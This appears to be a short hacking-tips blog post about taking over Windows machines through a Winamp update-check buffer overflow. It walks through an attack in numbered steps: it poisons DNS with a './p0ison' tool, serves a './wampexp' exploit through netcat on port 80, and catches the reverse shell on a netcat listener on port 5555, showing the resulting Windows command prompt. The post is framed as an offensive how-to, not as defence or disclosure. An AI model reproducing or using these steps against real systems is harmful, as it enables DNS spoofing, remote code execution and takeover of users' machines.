Blog Widget by LinkWithin

All tips and tricks about technology gadgets,computer stuff can be found here

How to hack through winamp

How Hackers Take over Through Winamp!!


Winamp has an option, enabled by default, which checks on startup for
the latest version from www.winamp.com and will then notify the user of
a possible upgrade via messagebox..


Unfortunately, if it were to receive a huge response, the thread
parsing the data is thrown into an infinite loop and eventually the
exception dispatcher is called.. and then like most of the time under
windows, a big, bad, overflow occurs.. i am attaching the real example


Sample attack

=============



Nameserver - 192.168.0.1

attacker - 192.168.1.2

victim (windows machine) - 192.168.0.2



1) attacker poisons nameserver cache


192.168.1.2:

x@x:~$ ./p0ison 192.168.0.1 www.winamp.com 192.168.1.2





2) victim is now resolving www.winamp.com to attacker machine



192.168.0.2:

C:>nslookup www.winamp.com

Server: z3.names.int

Address: 192.168.0.1



Name: www.winamp.com

Address: 192.168.1.2





3) attacker fires up exploit as web daemon



192.168.1.2:

x@x:~$ (./wampexp 192.168.1.2 5555)|nc -l -p 80





4) attacker waits for connect-back by exploit



192.168.1.2:

x@x:~$ nc -l -p 5555





5) foolish winamp user opens winamp!



192.168.0.2:


opens winamp, prepares for The Weather Girls - It\'s

Raining Men.mp3



6) BOOJAH!@



192.168.1.2:



x@x:~$ nc -l -p 5555

Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-2000 Microsoft Corp.



C:>


/// control over machine taken